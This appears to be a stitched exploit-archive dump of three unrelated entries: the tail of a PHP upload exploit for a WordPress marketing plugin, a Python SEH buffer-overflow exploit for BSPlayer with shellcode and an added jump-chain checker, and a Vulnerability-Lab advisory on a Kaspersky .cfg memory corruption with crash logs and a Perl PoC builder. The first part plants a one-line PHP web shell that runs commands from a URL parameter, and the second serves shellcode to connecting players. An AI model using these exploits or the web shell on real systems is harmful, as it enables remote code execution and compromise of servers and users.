curl_setopt($dz, CURLOPT_URL, "http://[Target]/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php");
curl_setopt($dz, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($dz, CURLOPT_POST, 1);
curl_setopt($dz, CURLOPT_POSTFIELDS, $postData );
curl_setopt($dz, CURLOPT_TIMEOUT, 0);
$buf = curl_exec ($dz);
curl_close($dz);
unset($dz);
echo $buf;

/*
[!] Create your shell file =>
 _ k3dz.php :

 <?php system($_GET['dz']); ?>
 
[>] Post the exploit 
[+] Find your backdoor : ../inboundio-marketing/admin/partials/uploaded_csv/k3dz.php?dz=[ CMD ]
[+] Or upload whatever you want ^_^ ...

*/

####
#  <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>
#  Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3
#---------------------------------------------------------------
# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , 
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz  , &
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & 
# PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ;
####

# REF : http://k3dsec.blogspot.com/2015/03/wordpress-plugin-inboundio-marketing.html

?>
            
#!/usr/bin/python

''' Bsplayer suffers from a buffer overflow vulnerability when processing the HTTP response when opening a URL.
In order to exploit this bug I partially overwrote the SEH record to land at a pop pop ret instead of the full
address, and then used backward jumping to jump to a long jump that eventually lands in my shellcode.

Tested on: Windows XP SP1, Windows 7 SP1, Windows 8 Enterprise. It might work in other versions as well; just give it a try :)

My twitter: @fady_osman
My youtube: https://www.youtube.com/user/cutehack3r
'''

import socket
import sys

if len(sys.argv) < 3:
    print("[x] Please enter an IP and port to listen on.")
    print("[x] " + sys.argv[0] + " ip port")
    sys.exit(1)

host = sys.argv[1]          # IP to listen on.
port = int(sys.argv[2])     # Port the player will be pointed at.

s = socket.socket()         # Create a TCP socket object.
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((host, port))        # Bind to the port.
print("[*] Listening on port " + str(port))
s.listen(5)                 # Now wait for the client connection.

# Shellcode, as published with the exploit.
buf =  b""
buf += b"\xbb\xe4\xf3\xb8\x70\xda\xc0\xd9\x74\x24\xf4\x58\x31"
buf += b"\xc9\xb1\x33\x31\x58\x12\x83\xc0\x04\x03\xbc\xfd\x5a"
buf += b"\x85\xc0\xea\x12\x66\x38\xeb\x44\xee\xdd\xda\x56\x94"
buf += b"\x96\x4f\x67\xde\xfa\x63\x0c\xb2\xee\xf0\x60\x1b\x01"
buf += b"\xb0\xcf\x7d\x2c\x41\xfe\x41\xe2\x81\x60\x3e\xf8\xd5"
buf += b"\x42\x7f\x33\x28\x82\xb8\x29\xc3\xd6\x11\x26\x76\xc7"
buf += b"\x16\x7a\x4b\xe6\xf8\xf1\xf3\x90\x7d\xc5\x80\x2a\x7f"
buf += b"\x15\x38\x20\x37\x8d\x32\x6e\xe8\xac\x97\x6c\xd4\xe7"
buf += b"\x9c\x47\xae\xf6\x74\x96\x4f\xc9\xb8\x75\x6e\xe6\x34"
buf += b"\x87\xb6\xc0\xa6\xf2\xcc\x33\x5a\x05\x17\x4e\x80\x80"
buf += b"\x8a\xe8\x43\x32\x6f\x09\x87\xa5\xe4\x05\x6c\xa1\xa3"
buf += b"\x09\x73\x66\xd8\x35\xf8\x89\x0f\xbc\xba\xad\x8b\xe5"
buf += b"\x19\xcf\x8a\x43\xcf\xf0\xcd\x2b\xb0\x54\x85\xd9\xa5"
buf += b"\xef\xc4\xb7\x38\x7d\x73\xfe\x3b\x7d\x7c\x50\x54\x4c"
buf += b"\xf7\x3f\x23\x51\xd2\x04\xdb\x1b\x7f\x2c\x74\xc2\x15"
buf += b"\x6d\x19\xf5\xc3\xb1\x24\x76\xe6\x49\xd3\x66\x83\x4c"
buf += b"\x9f\x20\x7f\x3c\xb0\xc4\x7f\x93\xb1\xcc\xe3\x72\x22"
buf += b"\x8c\xcd\x11\xc2\x37\x12"

# 5-byte near jump (E9 rel32) sitting at the end of the overflow; it jumps
# backwards into the NOP sled that precedes the shellcode.
jmplong = b"\xe9\x85\xe9\xff\xff"
# nSEH: 2-byte short jump (EB rel8) backwards onto jmplong, padded with NOPs.
nseh = b"\xeb\xf9\x90\x90"
# Partially overwriting the SEH record: the copy stops at the nulls, so only
# the low two bytes of the handler pointer are replaced (pop pop ret).
seh = b"\x3b\x58\x00\x00"
buflen = len(buf)
response = b"\x90" * 2048 + buf + b"\xcc" * (6787 - 2048 - buflen) + jmplong + nseh + seh

# The first response plays the role of the m3u so the player reconnects to
# our server; the same overflowing buffer is served again on the reconnect.
for attempt in ("first", "second"):
    c, addr = s.accept()    # Establish connection with the client.
    print("[*] Sending the payload " + attempt + " time", addr)
    c.recv(1024)            # Read (and discard) the player's HTTP request.
    c.sendall(response)
    c.close()
s.close()
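The two-hop jump chain above is easy to get off by a byte or two, so the following added example (not part of the original exploit) rebuilds the same payload layout in Python 3 and decodes each hop: the short jump stored in nSEH back onto the long jump, and the long jump back into the NOP sled in front of the shellcode. It also re-encodes both jumps from the intended source and destination offsets so the published bytes can be checked against them. Only the relative-jump arithmetic and the low word written over the handler pointer are verified; the pop/pop/ret address itself depends on the target module and is taken from the exploit unchanged. The placeholder shellcode is constructed for the demonstration.

```python
import struct

# Layout constants copied from the exploit (offsets are relative to the start
# of the HTTP response body that overflows the buffer).
NOP_SLED_LEN = 2048
OVERFLOW_LEN = 6787                 # offset at which the 5-byte long jump sits
JMPLONG = b"\xe9\x85\xe9\xff\xff"   # jmp rel32, as published
NSEH = b"\xeb\xf9\x90\x90"          # jmp rel8 + two NOPs, as published
SEH = b"\x3b\x58\x00\x00"           # partial overwrite: only the low word lands


def encode_jmp_rel8(src, dst):
    """Encode a 2-byte short jump located at `src` that lands at `dst`.
    x86 relative jumps are measured from the end of the instruction."""
    return b"\xeb" + struct.pack("<b", dst - (src + 2))


def encode_jmp_rel32(src, dst):
    """Encode a 5-byte near jump located at `src` that lands at `dst`."""
    return b"\xe9" + struct.pack("<i", dst - (src + 5))


def decode_jmp(payload, offset):
    """Return the offset the jmp at `offset` (EB rel8 or E9 rel32) transfers to."""
    opcode = payload[offset]
    if opcode == 0xEB:
        rel = struct.unpack_from("<b", payload, offset + 1)[0]
        return offset + 2 + rel
    if opcode == 0xE9:
        rel = struct.unpack_from("<i", payload, offset + 1)[0]
        return offset + 5 + rel
    raise ValueError("no jmp at offset %d (opcode %02x)" % (offset, opcode))


def build_response(shellcode):
    """Same layout as the exploit: sled, shellcode, filler, jmplong, nSEH, SEH."""
    filler_len = OVERFLOW_LEN - NOP_SLED_LEN - len(shellcode)
    if filler_len < 0:
        raise ValueError("shellcode does not fit in the space before jmplong")
    return (b"\x90" * NOP_SLED_LEN + shellcode + b"\xcc" * filler_len
            + JMPLONG + NSEH + SEH)


def check_layout(response):
    """Follow the chain SEH handler -> nSEH -> jmplong -> sled and report it."""
    nseh_off = OVERFLOW_LEN + len(JMPLONG)      # pop pop ret returns here
    seh_off = nseh_off + 4
    hop1 = decode_jmp(response, nseh_off)       # short jump from nSEH
    hop2 = decode_jmp(response, hop1)           # long jump from there
    return {
        "nseh_offset": nseh_off,
        "seh_offset": seh_off,
        "nseh_target": hop1,
        "final_target": hop2,
        "lands_in_sled": 0 <= hop2 < NOP_SLED_LEN,
        # Low 16 bits that replace the handler pointer's low word.
        "seh_low_word": struct.unpack_from("<H", response, seh_off)[0],
    }


if __name__ == "__main__":
    demo_shellcode = b"\xcc" * 64           # constructed placeholder shellcode
    info = check_layout(build_response(demo_shellcode))
    for key, value in info.items():
        print("%-14s %s" % (key, value))
```

Running the module reports that nSEH jumps to offset 6787 (jmplong) and jmplong lands at offset 1037, well inside the 2048-byte sled, which is why any reasonable shellcode length works without retuning the jumps.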
            
source: https://www.securityfocus.com/bid/51161/info

Kaspersky Internet Security and Anti-Virus are prone to a local memory-corruption vulnerability.

A local attacker can exploit this issue to cause the affected application to crash, denying service to legitimate users. Due to the nature of this issue, arbitrary code execution may be possible; this has not been confirmed. 

Title:
======
Kaspersky IS&AV 2011/12 - Memory Corruption Vulnerability


Date:
=====
2011-12-19


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=129


VL-ID:
=====
129


Introduction:
=============
Kaspersky Internet Security 2011 has everything that you need to stay safe and secure while you're surfing the web. 
It provides constant protection for you and your family, whether you work, bank, shop or play online.

Kaspersky Anti-Virus 2011 – the backbone of your PC’s security system, offering real-time automated protection from 
a range of IT threats. Kaspersky Anti-Virus 2011 provides the basic tools needed to protect your PC. Our award-winning 
technologies work silently in the background while you enjoy your digital life.

(Copy of Vendor Homepage: http://www.kaspersky.com/kaspersky_anti-virus  &&  http://www.kaspersky.com/kaspersky_internet_security)


Abstract:
=========
Vulnerability-Lab Team discovered a memory and pointer corruption vulnerability in Kaspersky Internet Security 2011/2012 and Kaspersky Anti-Virus 2011/2012.


Report-Timeline:
================
2010-12-04:	Vendor Notification
2011-01-16:	Vendor Response/Feedback
2011-12-19:	Public or Non-Public Disclosure


Status:
========
Published


Affected Products:
==================

Exploitation-Technique:
=======================
Local


Severity:
=========
Medium


Details:
========
A memory corruption vulnerability is detected in Kaspersky Internet Security 2011/2012 and Kaspersky Anti-Virus 2011/2012. 
The vulnerability is caused by an invalid pointer dereference when processing a corrupt .cfg file that passes the Kaspersky import exception filters, 
which could be exploited by attackers to crash the complete software process. 
The bug is located in basegui.ppl (basegui.dll) when processing a .cfg file import.


Vulnerable Modules: 

			[+] CFG IMPORT


Affected Version(s):
Kaspersky Anti-Virus 2012 & Kaspersky Internet Security 2012
KIS 2012 v12.0.0.374
KAV 2012 v12.x

Kaspersky Anti-Virus 2011 & Kaspersky Internet Security 2011
KIS 2011 v11.0.0.232 (a.b)
KAV 11.0.0.400
KIS 2011 v12.0.0.374

Kaspersky Anti-Virus 2010 & Kaspersky Internet Security 2010


--- Kaspersky Bug Logs ---

Folder:                  ../Analyses/Crash Reports (KIS&KAV)

KAV.11.0.0.232_08.04_22.24_3620.GUI.full.dmp
KAV.11.0.0.232_08.04_22.24_3620.GUI.mini.dmp
KAV.11.0.0.232_08.04_22.24_3620.GUI.tiny.dmp

KAV.11.0.0.232_08.04_22.28_2956.GUI.full.dmp
KAV.11.0.0.232_08.04_22.28_2956.GUI.mini.dmp
KAV.11.0.0.232_08.04_22.28_2956.GUI.tiny.dmp

KAV.11.0.0.232?_08.04_23.21_3712.GUI.full.dmp
KAV.11.0.0.232?_08.04_23.21_3712.GUI.mini.dmp
KAV.11.0.0.232?_08.04_23.21_3712.GUI.tiny.dmp

KAV.11.0.0.232?_08.04_23.54_2640.GUI.full.dmp
KAV.11.0.0.232?_08.04_23.54_2640.GUI.mini.dmp
KAV.11.0.0.232?_08.04_23.54_2640.GUI.tiny.dmp

Reference(s): 
				../Analyses/Crash Reports (KIS&KAV)/kav_x32.rar
				../Analyses/Crash Reports (KIS&KAV)/kis_x32-win7.zip
				../Analyses/Crash Reports (KIS&KAV)/kis_x64.zip

		

--- Service Crash Report Queue Logs ---

Folder: ../Analyses/Crash Reports (Service)

AppCrash_avp.exe_1d98841adaefc9689cba9c4bbd7
AppCrash_avp.exe_434b4962a0ccbccd3c2a6bd5f95
AppCrash_avp.exe_583f849d49fe1a714c9bd02ba4e
AppCrash_avp.exe_5f09d49c257b515e08a6defbf11
AppCrash_avp.exe_69cb355e72347419436f047a313
AppCrash_avp.exe_69cb355e72347419436f047a313
AppCrash_avp.exe_a7a7fe58d34d13f0136d933e977
AppCrash_avp.exe_d21fe6df9c207eac2d8c6bcacad
AppCrash_avp.exe_d2c8cf27ba2a3f6ceaad6c44327
AppCrash_avp.exe_ed94bb914e255192b71d1257c19


Version=1
EventType=APPCRASH
EventTime=129256270253026260
ReportType=2
Consent=1
UploadTime=129256270260076663
ReportIdentifier=d70927a2-a1d7-11df-81a1-95fa4108d4d6
IntegratorReportIdentifier=d70927a1-a1d7-11df-81a1-95fa4108d4d6
WOW64=1
Response.BucketId=1985200055
Response.BucketTable=1
Response.type=4
Sig[0].Name=Application Name
Sig[0].Value=avp.exe
Sig[1].Name=Application Version
Sig[1].Value=11.0.1.400
Sig[2].Name=Application Timestamp
Sig[2].Value=4c2cd011
Sig[3].Name=Fault Module Name
Sig[3].Value=basegui.ppl
Sig[4].Name=Fault Module Version
Sig[4].Value=11.0.1.400
Sig[5].Name=Fault Module Timestamp
Sig[5].Value=4c2cd193
Sig[6].Name=Exception Code
Sig[6].Value=c0000005
Sig[7].Name=Exception Offset
Sig[7].Value=00079c3c
DynamicSig[1].Name=OS Version
DynamicSig[1].Value=6.1.7600.2.0.0.768.3
DynamicSig[2].Name=Locale ID
DynamicSig[2].Value=1031
DynamicSig[22].Name=Additional Information 1
DynamicSig[22].Value=0a9e
DynamicSig[23].Name=Additional Information 2
DynamicSig[23].Value=0a9e372d3b4ad19135b953a78882e789
DynamicSig[24].Name=Additional Information 3
DynamicSig[24].Value=0a9e
DynamicSig[25].Name=Additional Information 4
DynamicSig[25].Value=0a9e372d3b4ad19135b953a78882e789
UI[2]=C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2011\avp.exe
UI[3]=Kaspersky Anti-Virus has stopped working
UI[4]=Windows can check online for a solution to the problem and try to restart the program.
UI[5]=Check online for a solution and restart the program
UI[6]=Check online for a solution later and close the program
UI[7]=Close the program
LoadedModule[0]=C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2011\avp.exe
LoadedModule[1]=C:\Windows\SysWOW64\ntdll.dll
LoadedModule[2]=C:\Windows\syswow64\kernel32.dll
LoadedModule[3]=C:\Windows\syswow64\KERNELBASE.dll
...
...
LoadedModule[148]=C:\Windows\SysWOW64\WMVCore.DLL
LoadedModule[149]=C:\Windows\SysWOW64\WMASF.DLL
LoadedModule[150]=C:\Windows\SysWOW64\EhStorAPI.dll
LoadedModule[151]=C:\Program Files (x86)\Internet Explorer\ieproxy.dll
LoadedModule[152]=C:\Windows\SysWOW64\SAMLIB.dll
State[0].Key=Transport.DoneStage1
State[0].Value=1
State[1].Key=DataRequest
State[1].Value=Bucket=1985200055/nBucketTable=1/nResponse=1/n
FriendlyEventName=Stopped working
ConsentKey=APPCRASH
AppName=Kaspersky Anti-Virus
AppPath=C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2011\avp.exe




--- System Crash Report Queue Logs ---

Folder:		Analyses//Crash Reports (System)

WER7A62.tmp.appcompat.txt
WER7FFE.tmp.mdmp
WER6127.tmp.WERInternalMetadata.xml



--- Exception Log ---
(a50.ee8): Access violation - code c0000005 (first/second chance not available)
eax=00000000 ebx=0331e7bc ecx=9699eef0 edx=6ddf9ba0 esi=00000002 edi=00000000
eip=76f900ed esp=0331e76c ebp=0331e808 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202




--- Debug Logs ---
FAULTING_IP: 
basegui+79bed
6ddf9bed 8b11            mov     edx,dword ptr [ecx]

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 6ddf9bed (basegui+0x00079bed)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 9699eef0
Attempt to read from address 9699eef0

PROCESS_NAME:  avp.exe

FAULTING_MODULE: 755b0000 kernel32
DEBUG_FLR_IMAGE_TIMESTAMP:  4c4f15cf
MODULE_NAME: basegui
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
EXCEPTION_PARAMETER1:  00000000
EXCEPTION_PARAMETER2:  9699eef0

READ_ADDRESS:  9699eef0 

FOLLOWUP_IP: 
basegui+79bed
6ddf9bed 8b11            mov     edx,dword ptr [ecx]

FAULTING_THREAD:  00000ee8
BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_WRITE_INVALID_POINTER_READ
PRIMARY_PROBLEM_CLASS:  INVALID_POINTER_WRITE
DEFAULT_BUCKET_ID:  INVALID_POINTER_WRITE
LAST_CONTROL_TRANSFER:  from 6ddf9bfd to 6ddf9bed

STACK_TEXT:  
0331f9b8 6ddf9bfd 0331fa54 02485068 00000001 basegui+0x79bed
0331f9f0 6ddf9bfd 0331fa54 02485068 00000001 basegui+0x79bfd
0331fa28 6de5bd10 0331fa54 02485068 00000001 basegui+0x79bfd
0331fa48 6de33ad0 0331fa54 000001f6 000001c2 basegui!DllUnregisterServer+0x12580
0331fa5c 6de34320 00000200 00000000 01c201f6 basegui+0xb3ad0
0331fa9c 6de34d45 000504b4 00000200 00000000 basegui+0xb4320
0331fae0 6de33fdd 000504b4 00000200 00000000 basegui+0xb4d45
0331fb30 754c6238 00000000 00000200 00000000 basegui+0xb3fdd
0331fb5c 754f12a1 02bb0fb0 000504b4 00000200 user32!gapfnScSendMessage+0x270
0331fbd8 754f10e2 0059afd4 02bb0fb0 000504b4 user32!SendNotifyMessageW+0x341
0331fc28 754f11e7 00a06c90 00000000 00000200 user32!SendNotifyMessageW+0x182
0331fc48 754c6238 000504b4 00000200 00000000 user32!SendNotifyMessageW+0x287
0331fc74 754c68ea 754f11be 000504b4 00000200 user32!gapfnScSendMessage+0x270
0331fcec 754c7d31 0059afd4 76db3908 000504b4 user32!gapfnScSendMessage+0x922
0331fd4c 754c7dfa 76db3908 00000000 0331fd88 user32!LoadStringW+0x11f
0331fd5c 754e2292 0331fe18 00000000 0331fe18 user32!DispatchMessageW+0xf
0331fd88 754e70a9 000504b4 00000000 02485048 user32!IsDialogMessageW+0x11e
0331fdb0 6de2e50b 000504b4 0331fe18 023d9be8 user32!IsDialogMessage+0x58
0331fdcc 6de20c1c 0331fe18 74113b90 00000000 basegui+0xae50b
0331fdfc 6de231a8 0331fe18 7411383c 02e260ec basegui+0xa0c1c
0331fe50 6de07dbc 00000000 005e8228 6ddd6f8c basegui+0xa31a8
0331fe64 72da3487 00000003 00000000 005e8244 basegui+0x87dbc


STACK_COMMAND:  ~5s; .ecxr ; kb
SYMBOL_STACK_INDEX:  0
SYMBOL_NAME:  basegui+79bed
FOLLOWUP_NAME:  MachineOwner
IMAGE_NAME:  basegui.ppl
BUCKET_ID:  WRONG_SYMBOLS
FAILURE_BUCKET_ID:  INVALID_POINTER_WRITE_c0000005_basegui.ppl!Unknown
WATSON_STAGEONE_URL:  http://watson.microsoft.com/StageOne/avp_exe/11_0_0_232/4be3cfb6/basegui_ppl/11_0_0_241/4c4f15cf/c0000005/00079bed.htm?Retriage=1

Followup: MachineOwner
---------
0:005> lmvm basegui
start    end        module name
6dd80000 6df19000   basegui    (export symbols)       basegui.ppl
    Loaded symbol image file: basegui.ppl
    Image path: C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2011\basegui.ppl
    Image name: basegui.ppl
    Timestamp:        Tue Jul 27 19:22:23 2010 (4C4F15CF)
    CheckSum:         0019E22D
    ImageSize:        00199000
    File version:     11.0.0.241
    Product version:  11.0.0.241
    File flags:       0 (Mask 3F)
    File OS:          40004 NT Win32
    File type:        1.0 App
    File date:        00000000.00000000
    Translations:     0409.04b0
    CompanyName:      Kaspersky Lab ZAO
    ProductName:      Kaspersky Anti-Virus
    InternalName:     BASEGUI
    OriginalFilename: BASEGUI.DLL
    ProductVersion:   11.0.0.241
    FileVersion:      11.0.0.241
    FileDescription:  Kaspersky Anti-Virus GUI Windows part
    LegalCopyright:   Copyright © Kaspersky Lab ZAO 1997-2010.
    LegalTrademarks:  Kaspersky Anti-Virus ®  is registered trademark of Kaspersky Lab ZAO.
0:005> .exr 0xffffffffffffffff
ExceptionAddress: 6ddf9bed (basegui+0x00079bed)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 9699eef0
Attempt to read from address 9699eef0


Information:
The Kaspersky .cfg file import has exception-handling filters that reject wrong or manipulated configuration imports, as the first test shows (wrong-way.png).
The PoC file is not caught by these import filters and gets through without any problems. The resulting invalid pointer read/write allows
a local attacker to crash the software via memory corruption. The technique and software used to detect the bug in the binary are private.

Notice:
A local attacker does not need to know any passwords to load a .cfg (configuration) file. (access-rights.png)


Folder:			../Analyses/Debug


References(Pictures):
						../appcrash1.png
						../appcrash2.png
						../appcrash3.png
						../appcrash4.png
						../appcrash5.png
						../debug&exception.png
						../kav2011.png
						../reproduce-x32.png
						../wrong-way.png
						../access-rights.png


Proof of Concept:
=================
The vulnerability can be exploited by a local attacker via the configuration import, or by a remote attacker with user interaction (the victim imports the crafted .cfg file).
To demonstrate or reproduce ...


#!/usr/bin/perl
##############################################################################
# Builds poc_pwn.cfg by joining part1.bin, a marker string and part2.bin.
use strict;
use warnings;

my $code = "corrupt";               # bytes inserted between the two parts
my $FilePath1 = "part1.bin";
my $FilePath2 = "part2.bin";
###################################################################
# Read a whole file as raw bytes.
sub slurp {
    my ($path) = @_;
    open(my $fh, '<', $path) or die "Cannot open $path: $!";
    binmode $fh;
    local $/;                       # slurp mode: read everything at once
    my $data = <$fh>;
    close($fh);
    return defined $data ? $data : '';
}
###################################################################
open(my $out, '>', 'poc_pwn.cfg') or die "Cannot create poc_pwn.cfg: $!";
binmode $out;
print $out slurp($FilePath1);
print $out $code;
print $out slurp($FilePath2);
close($out);
###################################################################


PoC:			
			../PoC/kis&kav_2011_2012_p0c.pl
			../PoC/part1.bin
			../PoC/part2.bin


Risk:
=====
The security risk of the bug/vulnerability is estimated as medium(+).


Credits:
========
Vulnerability Research Laboratory - Benjamin K.M. (Rem0ve)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-
Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of 
other media, are reserved by Vulnerability-Lab or its suppliers.

    						Copyright © 2011|Vulnerability-Lab